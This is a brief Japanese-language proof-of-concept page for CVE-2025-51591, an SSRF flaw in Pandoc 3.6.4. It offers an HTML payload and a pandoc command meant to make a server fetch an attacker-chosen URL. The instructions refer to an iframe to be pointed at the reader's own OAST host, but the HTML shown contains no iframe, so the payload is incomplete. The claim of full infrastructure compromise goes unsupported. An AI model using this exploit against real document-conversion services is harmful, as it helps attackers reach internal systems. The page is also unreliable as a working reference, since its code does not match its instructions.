
CVE-2025-51591 Pandoc SSRF脆弱性の概念実証
JGM Pandoc v3.6.4 におけるサーバーサイドリクエストフォージェリ (SSRF) により、攻撃者は細工されたiframeを注入することで、インフラ全体へのアクセスを取得し、侵害することが可能です。
⚠️ iframeのURLを自身のOAST URLに置き換えてください。 ⚠️
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>CVE-2025-51591 Proof Of Concept</title>
</head>
<body>
<h1>
CVE-2025-51591 Proof Of Concept
</h1>
</body>
</html>
pandoc payload.html -o output1.pdf